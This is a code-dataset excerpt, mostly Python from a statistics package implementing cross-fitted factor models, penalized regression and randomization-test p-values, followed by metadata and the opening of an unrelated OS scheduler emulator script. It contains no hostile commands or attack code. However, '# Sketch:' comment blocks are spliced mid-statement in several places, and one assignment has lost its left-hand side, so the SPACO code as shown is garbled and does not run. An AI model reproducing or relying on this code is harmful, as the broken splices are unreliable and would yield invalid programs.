    signs = np.zeros(cross_fit_obj.K)\n    for k in np.arange(cross_fit_obj.K):\n        signs[k] = 1\n        if cor_mat[orders[k], k] < 0:\n            signs[k] = -1\n    cross_fit_obj.V = cross_fit_obj.V[:,orders] * signs\n    cross_fit_obj.Phi = cross_fit_obj.Phi[:,orders]\n    cross_fit_obj.sigmaF = cross_fit_obj.sigmaF[orders]\n    if cross_fit_obj.beta is not None:\n        cross_fit_obj.beta = cross_fit_obj.beta[:,orders] * signs\n    if cross_fit_obj.intercepts is not None:\n        cross_fit_obj.intercepts = cross_fit_obj.intercepts[orders]*signs\n    if cross_fit_obj.lambda2 is not None:\n        cross_fit_obj.lambda2 = cross_fit_obj.lambda2[orders]\n    cross_fit_obj.lambda1 = cross_fit_obj.lambda1[orders]\n    return cross_fit_obj\n\n\nclass SPACOcross():\n    def __init__(self, spaco_obj = None, nfolds = 5, train_ids= None, test_ids=None,\n                 lam1_update = False, lam2_update = False, trace = False, random_state = 0):\n        self.nfolds = nfolds\n        self.beta_folds = spaco_obj.beta_folds\n        self.lam1_update = lam1_update\n        self.lam2_update = lam2_update\n        self.trace = trace\n        self.X = spaco_obj.X\n        self.O = spaco_obj.O\n        self.Z = spaco_obj.Z\n        self.Omega = spaco_obj.Omega.copy()\n        self.num_subjects = spaco_obj.num_subjects\n        self.num_times = spaco_obj.num_times\n        self.num_features = spaco_obj.num_features\n        self.K = spaco_obj.K\n        self.h = spaco_obj.h\n        self.homoNoise = spaco_obj.homoNoise\n        self.Phi = spaco_obj.Phi.copy()\n        self.V = spaco_obj.V.copy()\n        self.sigma = spaco_obj.sigma.copy()\n        self.mu = spaco_obj.mu.copy()\n        self.cov = spaco_obj.cov.copy()\n        ### expand the per-feature noise variances to the (feature x time) vector s2\n        self.s2 = np.zeros((self.num_features * self.num_times))\n        for j in np.arange(self.num_features):\n            ll = np.arange(j * self.num_times,(j + 1) * self.num_times)\n            self.s2[ll] = self.sigma[j]\n        self.sigmaF = spaco_obj.sigmaF.copy()\n        self.lambda1 = spaco_obj.lambda1.copy()\n        self.lambda2 = spaco_obj.lambda2.copy()\n        self.nlam1 = spaco_obj.nlam1\n        self.nlam2 = spaco_obj.nlam2\n        self.dfmin = spaco_obj.dfmin\n        self.dfmax = spaco_obj.dfmax\n        self.lam1criterion = spaco_obj.lam1criterion\n        self.transform_mat = spaco_obj.transform_mat.copy()\n        self.transform_vec = spaco_obj.transform_vec.copy()\n        self.transform_mat_cross = spaco_obj.transform_mat.copy()\n        self.transform_vec_cross = spaco_obj.transform_vec.copy()\n        self.fit_intercept = spaco_obj.fit_intercept\n        self.intercepts = spaco_obj.intercepts.copy()\n        self.orthogonal = spaco_obj.orthogonal\n        self.mu_cross = spaco_obj.mu.copy()\n        self.cov_cross = spaco_obj.cov.copy()\n        self.intermediantes = spaco_obj.intermediantes.copy()\n        if train_ids is None or test_ids is None:\n            k_fold = KFold(nfolds, shuffle=True, random_state=random_state)\n            subject_ids = np.arange(self.num_subjects)\n            split_id_obj = k_fold.split(subject_ids)\n            train_ids = []\n            test_ids = []\n            for train_index, test_index in split_id_obj:\n                train_ids.append(train_index.copy())\n                test_ids.append(test_index.copy())\n        self.train_ids = train_ids\n        self.test_ids = test_ids\n        self.crossV = np.zeros((spaco_obj.num_features, spaco_obj.K, nfolds))\n        self.crossPhi = np.zeros((spaco_obj.num_times, spaco_obj.K, nfolds))\n        self.crossSigmaF = np.zeros((spaco_obj.K, nfolds))\n        if spaco_obj.Z is not None:\n            self.crossBeta = np.zeros((spaco_obj.Z.shape[1], spaco_obj.K, nfolds))\n            self.crossIntercept = np.zeros((spaco_obj.K, nfolds))\n            self.beta = spaco_obj.beta.copy()\n            self.intercepts = spaco_obj.intercepts.copy()\n        else:\n            self.crossBeta = None\n            self.crossIntercept = None\n            self.beta = None\n    def crossfit(self, nfolds0=5, max_iter=10, max_iter0=5, tol=0.01):\n
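        # Editorial summary (added): refit SPACO on each training fold, align that\n        # fold's factors to the full fit via permutation_align_greedy, then compute\n        # posteriors for held-out subjects so mu_cross/cov_cross are cross-fitted.\n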
        temp_vec = np.zeros((self.num_subjects, self.K))\n        PhiV0 = np.zeros((self.num_times * self.num_features, self.K))\n        # reference PhiV basis from the full fit, used to align and sign the fold fits\n        for k in np.arange(self.K):\n            PhiV0[:, k] = np.kron(self.V[:, k].reshape((self.num_features, 1)),\n                                  self.Phi[:, k].reshape((self.num_times,1))).reshape(-1)\n        for fold_id in np.arange(self.nfolds):\n            if self.trace:\n                print(\"######################\")\n                print(\"fold\" + str(fold_id) + \":\")\n            opts = {}\n            opts['X'] = self.X[self.train_ids[fold_id], :, :];\n            opts['O'] = self.O[self.train_ids[fold_id], :, :];\n            opts['Omega'] = self.Omega\n            opts['h'] = self.h\n            if self.Z is not None:\n                opts['Z'] = self.Z[self.train_ids[fold_id], :];\n            else:\n                opts['Z'] = None\n            opts['K'] = self.K\n            opts['intercept'] = self.fit_intercept\n            opts['orthogonal'] = self.orthogonal\n            opts['cov'] = self.cov[self.train_ids[fold_id], :,:].copy();\n            opts['mu'] = self.mu[self.train_ids[fold_id],:].copy();\n            opts['V'] = self.V.copy();\n            opts['Phi'] = self.Phi.copy();\n            opts['sigma'] = self.sigma.copy();\n            opts['sigmaF'] = self.sigmaF.copy();\n            opts['lam1_update'] = self.lam1_update\n            opts['lam2_update'] = self.lam2_update\n            opts['nlam1'] = self.nlam1\n            opts['nlam2'] = self.nlam2\n            if self.Z is not None:\n                opts['beta'] = np.zeros(self.beta.shape)\n            else:\n                opts['beta'] = None\n            if self.lambda2 is not None:\n                opts['lambda2'] = self.lambda2.copy();\n            else:\n                opts['lambda2'] = None\n            opts['beta_folds'] = self.beta_folds; opts['foldid'] = None\n            opts['lambda1'] = self.lambda1;\n            opts['dfmin'] = self.dfmin\n            opts['dfmax'] = self.dfmax\n            opts['extra_sd'] = self.lam1criterion\n            opts['homoNoise'] = self.homoNoise\n            tmp = SPACO(opts)\n            tmp.check_init()\n            tmp = SPACOfitSingle(self = tmp, max_iter = max_iter, tol = tol, max_iter0=max_iter0,\n                                 nfolds0 = nfolds0, trace = self.trace,\n                                 update_sigma = False, update_sigmaF = True, update_cov = True)\n            PhiV = np.zeros((self.num_times*self.num_features, self.K))\n            # find the most correlated PhiV dimension and flip the sign\n            for k in np.arange(self.K):\n                PhiV[:,k] = np.kron(tmp.V[:,k].reshape((self.num_features,1)),\n                                    tmp.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n            cor_mat = np.corrcoef(np.transpose(np.hstack([PhiV0, PhiV])))\n            cor_mat = cor_mat[self.K:,:self.K]\n            tmp = permutation_align_greedy(tmp, cor_mat)\n            self.crossV[:, :, fold_id] = tmp.V.copy()\n            self.crossPhi[:, :, fold_id] = tmp.Phi.copy()\n            self.crossSigmaF[:,fold_id] = tmp.sigmaF.copy()\n            if self.Z is not None:\n                self.crossBeta[:, :, fold_id] = tmp.beta.copy()\n                if self.fit_intercept is not None:\n                    self.crossIntercept[:,fold_id] = tmp.intercepts.copy()\n            # correction\n            xte = self.intermediantes['Xmod1'][self.test_ids[fold_id], :]\n            ote = self.intermediantes['O1'][self.test_ids[fold_id], :]\n            if self.Z is not None:\n                zte = self.Z[self.test_ids[fold_id], :]\n            else:\n                zte = None\n            PhiV = np.zeros((self.num_times*self.num_features, self.K))\n            # recompute PhiV with the aligned factors\n            for k in np.arange(self.K):\n                PhiV[:,k] = np.kron(tmp.V[:,k].reshape((self.num_features,1)),\n                                    tmp.Phi[:,k].reshape((self.num_times,1))).reshape(-1)\n            mu, cov, transform_vec, transform_mat, temp_vec0 = \\\n                cross_posterior(xte = xte, ote = ote, zte = zte, s2 = self.s2, sigmaF = tmp.sigmaF,\n                                PhiV = PhiV, beta=tmp.beta, intercepts=tmp.intercepts,fit_intercept=tmp.fit_intercept)\n            self.transform_vec_cross[self.test_ids[fold_id],:] = transform_vec.copy()\n
transform_mat.copy()\n temp_vec[self.test_ids[fold_id],:] = temp_vec0.copy()\n self.mu_cross[self.test_ids[fold_id],:] = mu.copy()\n self.cov_cross[self.test_ids[fold_id],:,:] = cov.copy()\n if self.Z is not None:\n self.crossBeta[:, :, fold_id] = tmp.beta.copy()\n self.crossIntercept[:,fold_id] = tmp.intercepts.copy()\n #calculate posteriors for scaling\n if self.Z is not None:\n beta, intercepts, lambda2 = beta_fit(Z=self.Z,\n transform_mat=self.transform_mat_cross,\n transform_vec=self.transform_vec_cross,\n beta=self.beta,intercepts=self.intercepts,\n lambda2=self.lambda2, fit_intercept=self.fit_intercept,\n lam2_update=self.lam2_update, nlam2=self.nlam2,\n nfolds=nfolds0, max_iter=1, tol=tol)\n else:\n beta = None\n intercepts = np.zeros(self.K)\n self.beta = beta\n self.intercepts = intercepts\n added = np.zeros((self.num_subjects, self.K))\n if self.Z is not None:\n added = np.matmul(self.Z, self.beta)\n if self.fit_intercept:\n added = added + self.intercepts\n for fold_id in np.arange(self.nfolds):\n # correction\n sigmaF = self.crossSigmaF[:,fold_id]\n tmp1 = temp_vec[self.test_ids[fold_id],:]+added[self.test_ids[fold_id],:]/sigmaF\n mu = np.zeros((len(self.test_ids[fold_id]), self.K))\n for i in np.arange(len(self.test_ids[fold_id])):\n mu[i,:] = np.matmul(self.cov_cross[i,:,:], tmp1[i,:])\n self.mu_cross[self.test_ids[fold_id],:] = mu.copy()\n for k in np.arange(self.K):\n r1 = np.sqrt(np.sum(self.mu_cross[:,k] ** 2) / np.sum(self.mu[:,k]** 2))\n r2 = np.corrcoef(self.mu[:,k],self.mu_cross[:,k])[0,1]\n if r2 < 0:\n r2 = 0.0\n r = r1*r2\n if r < 1:\n self.mu[:, k] = self.mu[:, k] * r\n\n\ndef beta_fit_cleanup(Z, beta, intercepts, delta, prevec, cov, noiseCov,\n test_ids, sigmaF, lambda2, factor_idx = None,\n fit_intercept = True, max_iter = 1, tol = 0.01,\n lam2_update = True, nlam2 = 100, nfolds = 5, foldid= None,\n beta_fix = None, intercepts_fix = None, iffix = False):\n ##create y and z\n I = Z.shape[0]\n K = beta.shape[1]\n augZ = Z.copy()\n err = 2.0 * tol\n it = 0\n beta_prev = beta.copy()\n intercepts_prev = intercepts.copy()\n if factor_idx is None:\n factor_idx = np.arange(K)\n while it < max_iter and err > tol:\n if fit_intercept is True:\n augZ = np.hstack([Z, np.ones((Z.shape[0], 1), dtype=float)])\n for k in factor_idx:\n mu_trans = np.zeros(Z.shape[0])\n Z_trans = np.zeros(augZ.shape)\n if iffix is False:\n bb = np.delete(beta_prev, k, axis=1)\n else:\n bb = np.delete(beta_fix, k, axis=1)\n tmp0 = np.matmul(Z, bb)\n if fit_intercept:\n if iffix is False:\n tmp0 = tmp0 + np.delete(intercepts_prev, k)\n else:\n tmp0 = tmp0 + np.delete(intercepts_fix,k)\n for fold_id in np.arange(len(test_ids)):\n for i0 in np.arange(len(test_ids[fold_id])):\n i = test_ids[fold_id][i0]\n wik = 1.0/np.sqrt(noiseCov[i,k,k])\n mu_trans[i] = np.sum(cov[i,k,:]*prevec[i,:])\n for l in np.arange(K):\n if l != k:\n mu_trans[i] += delta * cov[i,k,l] * sigmaF[l,fold_id]\n mu_trans[i] = mu_trans[i] * wik\n Z_trans[i,:] = augZ[i,:] * (1.0 - delta * cov[i,k,k]/sigmaF[k,fold_id]) * wik\n penalty_factor = np.ones(Z_trans.shape[1])\n if fit_intercept:\n penalty_factor[Z_trans.shape[1] - 1] = 0.0\n if lam2_update:\n coefficients, lambda1min, cvm, cvsd, lambdas = my_cv_glmnet(x=Z_trans, y=mu_trans,\n penalty_factor=penalty_factor, nlam= nlam2, nfolds=nfolds, foldid = foldid)\n lambda2[k] = lambda1min\n else:\n coefficients = my_glmnet(x=Z_trans, y=mu_trans, lam=lambda2[k], nlam=100, penalty_factor=penalty_factor)\n p0 = len(coefficients)\n if fit_intercept:\n intercepts[k] = coefficients[p0 - 1]\n p0 
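# Sketch: the rescaling at the end of crossfit shrinks each factor score by r = r1 * r2,
# where r1 is the cross-fitted/full-fit norm ratio and r2 their correlation floored at 0,
# and the shrinkage is applied only when r < 1. The same step for one factor, with
# synthetic scores:
import numpy as np

mu = np.random.randn(100)                          # full-fit scores (illustrative)
mu_cross = 0.8 * mu + 0.3 * np.random.randn(100)   # cross-fitted scores (illustrative)
r1 = np.sqrt(np.sum(mu_cross ** 2) / np.sum(mu ** 2))
r2 = max(np.corrcoef(mu, mu_cross)[0, 1], 0.0)
r = r1 * r2
if r < 1:
    mu = mu * r                                    # shrink, never inflate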
= p0 - 1\n            beta[:, k] = coefficients[:p0].copy()\n        err = np.sum((beta - beta_prev)**2)\n        it += 1\n        beta_prev = beta.copy()\n        intercepts_prev = intercepts.copy()\n    return beta, intercepts, lambda2\n\n'''\nCRtest and CRtest_cross fix estimated model parameters other than beta\nand compare the p-values using randomized (conditional) variables.\n'''\nclass CRtest_cross:\n    def __init__(self, spaco_cross, type = 'cross', delta = 1.0):\n        self.type = type\n        self.K = spaco_cross.K\n        self.delta = delta\n        self.Z = spaco_cross.Z.copy()\n        self.U = np.zeros((spaco_cross.num_subjects, spaco_cross.K))\n        if self.type == 'cross':\n            self.cov = spaco_cross.cov_cross.copy()\n            self.sigmaF = spaco_cross.crossSigmaF.copy()\n            self.transform_mat = spaco_cross.transform_mat_cross.copy()\n            self.transform_vec = spaco_cross.transform_vec_cross.copy()\n            self.test_ids = spaco_cross.test_ids\n            self.train_ids = spaco_cross.train_ids\n        else:\n            self.cov = spaco_cross.cov.copy()\n            self.transform_mat = spaco_cross.transform_mat.copy()\n            self.transform_vec = spaco_cross.transform_vec.copy()\n            self.test_ids = [np.arange(self.Z.shape[0])]\n            self.train_ids = [np.arange(self.Z.shape[0])]\n            self.sigmaF = np.ones((self.K, 1))\n            self.sigmaF[:,0] = spaco_cross.sigmaF.copy()\n        self.beta = spaco_cross.beta.copy()\n        self.beta_tmp = self.beta.copy()\n        self.beta_drop = np.zeros((spaco_cross.beta.shape[0], spaco_cross.beta.shape[1], spaco_cross.beta.shape[0]))\n        self.intercepts = spaco_cross.intercepts.copy()\n        self.intercepts_tmp = spaco_cross.intercepts.copy()\n        self.intercepts_drop = np.zeros((self.K, self.beta.shape[0]))\n        self.lambda2 = spaco_cross.lambda2.copy()\n        self.fit_intercept = spaco_cross.fit_intercept\n        self.lam2_update = spaco_cross.lam2_update\n        self.nlam2 = spaco_cross.nlam2\n        self.Zuse = np.zeros((self.Z.shape[0], self.K))\n        self.Ztheta = np.zeros((self.Z.shape[0], self.K, self.K))\n        self.offsets = np.ones((self.Z.shape[0], self.K))\n        self.coef_marginal = np.zeros((self.Z.shape[1], self.K))\n        self.coef_partial = np.zeros((self.Z.shape[1], self.K))\n        self.residuals = np.zeros((self.Z.shape[0], self.K))\n        self.cov_delta = self.cov.copy()\n        self.noiseCOV_delta = np.ones((self.Z.shape[0], self.K, self.K))\n        self.noise_inv = np.ones((self.Z.shape[0], self.K, self.K))\n        self.prevec = self.transform_vec.copy()\n        self.transform_y = np.zeros((self.Z.shape[0], self.K))\n        self.transform_residuals = np.zeros((self.Z.shape[0], self.K))\n        self.theta = np.zeros((self.Z.shape[1],self.K))\n        self.weights1 = np.zeros((self.Z.shape[0], self.K))\n        self.weights2 = np.zeros((self.Z.shape[0], self.K))\n        self.foldid = None\n    def cut_folds(self, nfolds = 5, random_state = 1):\n        k_fold = KFold(nfolds, shuffle=True, random_state=random_state)\n        subject_ids = np.arange(self.Z.shape[0])\n        split_id_obj = k_fold.split(subject_ids)\n        train_ids = []\n        test_ids = []\n        for train_index, test_index in split_id_obj:\n            train_ids.append(train_index.copy())\n            test_ids.append(test_index.copy())\n        self.foldid = np.zeros(self.Z.shape[0], dtype = int)\n        for fold_id in np.arange(nfolds):\n            self.foldid[test_ids[fold_id]] = fold_id + 1\n    def precalculation0(self):\n        # calculate prevec\n        for fold_id in np.arange(len(self.test_ids)):\n            for i0 in np.arange(len(self.test_ids[fold_id])):\n                i = self.test_ids[fold_id][i0]\n                tmp1 = np.linalg.inv(self.cov[i, :, :])\n                self.prevec[i, :] = np.matmul(tmp1,self.transform_vec[i,:] * self.sigmaF[:,fold_id])\n    def precalculation(self):\n        for fold_id in 
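# Sketch: beta_fit_cleanup above alternates over factors, forming a transformed response
# mu_trans and design Z_trans, then solving an l1-penalized regression via the project's
# my_glmnet / my_cv_glmnet helpers. A rough stand-in for one such inner solve using
# scikit-learn's Lasso (not the package's actual solver; glmnet parameterizes the
# penalty differently, so alpha here is illustrative):
import numpy as np
from sklearn.linear_model import Lasso

rng = np.random.default_rng(0)
Z_trans = rng.normal(size=(50, 8))                               # transformed covariates
mu_trans = 0.5 * Z_trans[:, 0] + rng.normal(scale=0.1, size=50)  # transformed response
fit = Lasso(alpha=0.05, fit_intercept=True).fit(Z_trans, mu_trans)
beta_k, intercept_k = fit.coef_, fit.intercept_  # analogous to coefficients[:p0] and the unpenalized intercept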
np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n tmp1 = np.linalg.inv(self.cov[i, :, :])\n tmp2 = np.diag(1.0/self.sigmaF[:,fold_id])\n self.cov_delta[i, :, :] = np.linalg.inv(tmp1 - tmp2 + self.delta* tmp2)\n self.noiseCOV_delta[i,:,:] = np.diag(self.sigmaF[:,fold_id]) + (1.0 - 2*self.delta)*self.cov_delta[i,:,:]+\\\n (self.delta**2-self.delta) * np.matmul(self.cov_delta[i,:,:]/self.sigmaF[:,fold_id],self.cov_delta[i,:,:])\n self.noise_inv[i,:,:] = np.linalg.inv(self.noiseCOV_delta[i,:,:])\n def beta_fun_full(self, foldid = None, nfolds = 5, max_iter = 1, tol = 0.01, fixbeta0 = True):\n self.beta_tmp, intercepts_tmp, lambda2 = beta_fit_cleanup(Z = self.Z, beta = self.beta_tmp,\n intercepts = self.intercepts_tmp, delta =self.delta, prevec = self.prevec,\n cov = self.cov_delta, noiseCov = self.noiseCOV_delta, test_ids = self.test_ids,\n sigmaF = self.sigmaF, lambda2 = self.lambda2,factor_idx=None, lam2_update=self.lam2_update, nlam2= self.nlam2,\n nfolds = nfolds, foldid = self.foldid, fit_intercept = self.fit_intercept, max_iter =max_iter, tol =tol,\n beta_fix = self.beta, intercepts_fix = self.intercepts, iffix =fixbeta0)\n def beta_fun_one(self, nfolds, j = 0, max_iter = 1, tol = 0.01, fixbeta0 = True):\n idx = np.arange(self.Z.shape[1])\n idx = np.delete(idx, j)\n Z1 = np.delete(self.Z, j, axis = 1)\n if fixbeta0:\n beta1 = np.delete(self.beta, j, axis=0).copy()\n intercepts = self.intercepts.copy()\n else:\n beta1 = np.delete(self.beta_tmp, j,axis=0).copy()\n intercepts = self.intercepts_tmp.copy()\n for k in np.arange(self.K):\n if self.beta_tmp[j, k] == 0:\n self.beta_drop[:, k, j] = self.beta_tmp[:,k].copy()\n self.intercepts_drop[k, j] = self.intercepts_tmp[k].copy()\n else:\n beta1, intercepts, lambda2 =beta_fit_cleanup(Z = Z1, beta = beta1,\n intercepts = intercepts, delta = self.delta, prevec = self.prevec,\n cov = self.cov_delta, noiseCov = self.noiseCOV_delta, test_ids = self.test_ids,\n sigmaF = self.sigmaF, lambda2 = self.lambda2, factor_idx = [k],lam2_update=self.lam2_update, nlam2= self.nlam2,\n nfolds = nfolds, foldid =self.foldid, fit_intercept = self.fit_intercept, max_iter = max_iter,tol=tol,\n beta_fix = beta1, intercepts_fix = intercepts, iffix =True)\n self.beta_drop[idx, k, j] = beta1[:,k].copy()\n self.intercepts_drop[k,j] = intercepts[k].copy()\n def precalculation_response(self, j = 0):\n ###precalculate ``response\" used for calculating marginal or partial correlation\n fitted =np.matmul(self.Z,self.beta_drop[:,:,j])\n for k in np.arange(self.K):\n fitted[:,k] = fitted[:,k]+self.intercepts_drop[k,j]\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n self.transform_y[i,:] = np.matmul(self.cov_delta[i,:,:], self.prevec[i,:])\n for k in np.arange(self.K):\n for l in np.arange(self.K):\n if l != k:\n self.transform_y[i, k] = self.transform_y[i,k] + self.delta * self.cov[i,k,l] * fitted[i,l] /self.sigmaF[l,fold_id]\n self.residuals[i, k] = self.transform_y[i, k] - (1.0 - self.cov[i,k,k]/self.sigmaF[k,fold_id]) * fitted[i,k]\n self.weights1[i,k] = 1.0/self.noiseCOV_delta[i,k,k]\n self.weights2[i,k] = 1.0 - self.delta * self.cov_delta[i,k,k]/self.sigmaF[k,fold_id]\n #def Ztheta_prepare(self):\n def Ztheta_calculate(self, j = 0):\n for fold_id in np.arange(len(self.test_ids)):\n for i0 in np.arange(len(self.test_ids[fold_id])):\n i = self.test_ids[fold_id][i0]\n self.Ztheta[i,:,:] = self.Z[i,j] * (np.identity(self.K) - 
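# Sketch: precalculation above perturbs each subject's posterior covariance along the
# prior precision diag(1/sigmaF) by a factor delta. The same algebra for a single
# subject, with a synthetic positive-definite covariance:
import numpy as np

K, delta = 3, 0.5
sigmaF = np.array([1.0, 0.5, 2.0])
A = np.random.randn(K, K)
cov = np.linalg.inv(A @ A.T + np.diag(1.0 / sigmaF))   # stand-in posterior covariance
prior_prec = np.diag(1.0 / sigmaF)
cov_delta = np.linalg.inv(np.linalg.inv(cov) - prior_prec + delta * prior_prec)
noise_cov = (np.diag(sigmaF) + (1.0 - 2 * delta) * cov_delta
             + (delta ** 2 - delta) * (cov_delta / sigmaF) @ cov_delta)
noise_inv = np.linalg.inv(noise_cov)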
self.delta * self.cov_delta[i,:,:]/self.sigmaF[:,fold_id])\n def coef_partial_fun(self,j, joint = False):\n if joint:\n #scale the response and the covariate\n A = np.zeros((self.K, self.K))\n a = np.zeros((self.K))\n for i in np.arange(self.Z.shape[0]):\n tmp = np.matmul(np.transpose(self.Ztheta[i,:,:]),self.noise_inv[i,:,:])\n A += np.matmul(tmp,self.Ztheta[i,:,:])\n a += np.matmul(tmp, self.residuals[i,:])\n self.coef_partial[j,:] = np.matmul(np.linalg.inv(A),a)\n else:\n for k in np.arange(self.K):\n self.coef_partial[j,k] = np.sum(self.residuals[:,k] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k])/np.sum(self.Z[:,j] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k]**2)\n def coef_marginal_fun(self,j,joint = False):\n if joint:\n #scale the response and the covariate\n A = np.zeros((self.K, self.K))\n a = np.zeros((self.K))\n for i in np.arange(self.Z.shape[0]):\n tmp = np.matmul(np.transpose(self.Ztheta[i,:,:]),self.noise_inv[i,:,:])\n A += np.matmul(tmp,self.Ztheta[i,:,:])\n a += np.matmul(tmp, self.transform_y[i,:])\n self.coef_marginal[j,:] = np.matmul(np.linalg.inv(A),a)\n else:\n for k in np.arange(self.K):\n self.coef_marginal[j,k] = np.sum(self.transform_y[:,k] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k])/np.sum(self.Z[:,j] * self.Z[:,j] * self.weights1[:,k]*self.weights2[:,k]**2)\n\n\ndef pvalue_fit(z, nulls, dist_name):\n dist = getattr(scipy.stats, dist_name)\n mu = np.mean(nulls)\n s = np.std(nulls)\n t_null = (nulls - mu) / s\n t0 = np.abs((z - mu) / s)\n params = dist.fit(t_null)\n arg = params[:-2]\n loc = params[-2]\n scale = params[-1]\n pval = dist.cdf(-t0, *arg, loc=loc, scale=scale)+1.0 - dist.cdf(t0, *arg, loc=loc, scale=scale)\n return pval\n\n\n'''\n@spaco: a spaco/spaco_cross object\n@Zconditional: randomly generated N * q * B array for conditional randomization test. None = skip.\n@Zmarginal: randomly generated N * q * B array for conditional randomization test. 
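# Sketch: pvalue_fit above standardizes the null draws, fits the named scipy.stats
# distribution to them, and returns a two-sided tail probability for the observed
# statistic. Usage in isolation, assuming pvalue_fit from this module is in scope
# (the nulls here are synthetic; 'nct' is the default used by CRtest_pvals below):
import numpy as np

nulls = np.random.standard_t(df=5, size=500)   # stand-in randomization-null statistics
p = pvalue_fit(z=3.2, nulls=nulls, dist_name='nct')
print(p)                                       # small p => 3.2 is extreme relative to the nulls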
None = skip.\n@dist_name: distribution used for fitting the nulls.\n@method: 'cross' if spaco comes from cross-fitting; anything else treats it as a single fit.\n@trace: whether to print progress.\n'''\ndef CRtest_pvals(spaco, Zconditional = None, Zmarginal = None,\n                 nfolds = 5, dist_name = 'nct',\n                 method = 'cross', trace = False, random_state=0):\n    I = spaco.Z.shape[0]; q = spaco.Z.shape[1]\n    if method != 'cross':\n        method = 'spaco'\n    if Zconditional is not None:\n        B1 = Zconditional.shape[2]\n    else:\n        B1 = None\n    if Zmarginal is not None:\n        B2 = Zmarginal.shape[2]\n    else:\n        B2 = None\n    if Zconditional is None and Zmarginal is None:\n        print('No randomized variables are provided.')\n        return\n    delta = 0; tol = 0.01; fixbeta0 = False;\n    feature_eval = CRtest_cross(spaco, type = method, delta = delta)\n    feature_eval.precalculation0()\n    feature_eval.precalculation()\n    feature_eval.beta_tmp = np.zeros(feature_eval.beta_tmp.shape)\n    feature_eval.cut_folds(nfolds=nfolds, random_state=random_state)\n    feature_eval.beta_fun_full(nfolds=nfolds, max_iter=1, tol= tol, fixbeta0=fixbeta0)\n    # estimate the leave-one-feature-out coefficients\n    for j in np.arange(feature_eval.Z.shape[1]):\n        if trace:\n            print(j)\n        feature_eval.beta_fun_one(nfolds=nfolds, j=j,max_iter=1,fixbeta0=fixbeta0)\n    # calculate the test statistics for conditional and marginal independence\n    for j in np.arange(feature_eval.Z.shape[1]):\n        feature_eval.precalculation_response(j=j)\n        feature_eval.coef_partial_fun(j = j, joint=False)\n        feature_eval.coef_marginal_fun(j = j, joint=False)\n    # calculate the randomized test statistics\n    ### null distributions\n    if B1 is not None:\n        coef_random_partial = np.zeros((spaco.Z.shape[1], spaco.K, B1))\n    if B2 is not None:\n        coef_random_marginal = np.zeros((spaco.Z.shape[1], spaco.K, B2))\n    feature_eval_random = copy.deepcopy(feature_eval)\n    for j in np.arange(feature_eval.Z.shape[1]):\n        if trace:\n            print(j)\n        feature_eval_random.Z = feature_eval.Z.copy()\n        feature_eval_random.precalculation_response(j=j)\n        if B1 is not None:\n            for b in np.arange(B1):\n                feature_eval_random.Z[:, j] = Zconditional[:, j,b].copy()\n                feature_eval_random.coef_partial_fun(j=j, joint=False)\n                coef_random_partial[j, :,b] = feature_eval_random.coef_partial[j,:].copy()\n        if B2 is not None:\n            for b in np.arange(B2):\n                feature_eval_random.Z[:, j] = Zmarginal[:, j,b].copy()\n                feature_eval_random.coef_marginal_fun(j=j,joint=False)\n                coef_random_marginal[j, :,b] = feature_eval_random.coef_marginal[j,:].copy()\n    if B1 is not None:\n        pvals_fitted_partial = np.zeros((feature_eval.Z.shape[1], spaco.K))\n        pvals_empirical_partial = np.zeros((feature_eval.Z.shape[1], spaco.K))\n    else:\n        pvals_fitted_partial = None\n        pvals_empirical_partial = None\n    if B2 is not None:\n        pvals_fitted_marginal = np.zeros((feature_eval.Z.shape[1], spaco.K))\n        pvals_empirical_marginal = np.zeros((feature_eval.Z.shape[1], spaco.K))\n    else:\n        pvals_empirical_marginal = None\n        pvals_fitted_marginal = None\n    for j in np.arange(feature_eval.Z.shape[1]):\n        if trace:\n            print(j)\n        for k in np.arange(spaco.K):\n            if B1 is not None:\n                nulls = coef_random_partial[j, k, :]\n                # drop NaN null draws\n                idx = np.where(~np.isnan(nulls))[0]\n                pvals_empirical_partial[j,k] = (np.sum(np.abs(nulls[idx])>=np.abs(feature_eval.coef_partial[j,k]))+1)/(len(idx)+1)\n                pvals_fitted_partial[j, k] = pvalue_fit(z=feature_eval.coef_partial[j, k],nulls=nulls[idx], dist_name=dist_name)\n            if B2 is not None:\n                nulls = coef_random_marginal[j, k, :]\n                # drop NaN null draws\n                idx = np.where(~np.isnan(nulls))[0]\n                
pvals_empirical_marginal[j,k] = (np.sum(np.abs(nulls[idx])>=np.abs(feature_eval.coef_marginal[j,k]))+1)/(len(idx)+1)\n pvals_fitted_marginal[j,k] = pvalue_fit(z = feature_eval.coef_marginal[j,k], nulls = nulls[idx], dist_name = dist_name)\n return pvals_fitted_partial, pvals_fitted_marginal, pvals_empirical_partial, pvals_empirical_marginal\n","sub_path":"spaco/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":66879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"418657489","text":"from hardware import *\nfrom so import *\nimport log\nfrom shell import *\nfrom time import sleep\nimport sys\n\n\n##\n## MAIN \n##\nif __name__ == '__main__':\n log.setupLogger()\n log.logger.info('Starting emulator')\n\n ## setup our hardware and set memory size to 32 \"cells\"\n HARDWARE.setup(32)\n\n SCHEDULER_FCFS = 'FCFS'\n SCHEDULER_RR = 'RR'\n SCHEDULER_NP = 'NP'\n SCHEDULER_P = 'P'\n\n #scheduler choose\n sche = SCHEDULER_FCFS #<<<<<<< choose here or at cli\n\n if len(sys.argv) > 1:\n sche = sys.argv[1]\n\n if sche == SCHEDULER_RR:\n timer = HARDWARE.timer\n timer.quantum = 2\n scheduler = SchedulerRRB()\n if sche == SCHEDULER_FCFS:\n scheduler = SchedulerFCFS()\n if sche == SCHEDULER_NP:\n scheduler = SchedulerNonPreemtive()\n if sche == SCHEDULER_P:\n scheduler = SchedulerPreemtive()\n\n print(\"Runnnig\", scheduler.name)\n\n\n ## Switch on computer\n HARDWARE.switchOn()\n\n ## new create the Operative System Kernel\n # \"booteamos\" el sistema operativo\n kernel = Kernel(HARDWARE,scheduler, frameSize = 8)\n # sleep(1)\n\n # Ahora vamos a intentar ejecutar 3 programas a la vez\n ##################\n \"\"\"\n prg1 = Program([\n ASM.HEADER(10),\n ASM.CPU(1), #0\n 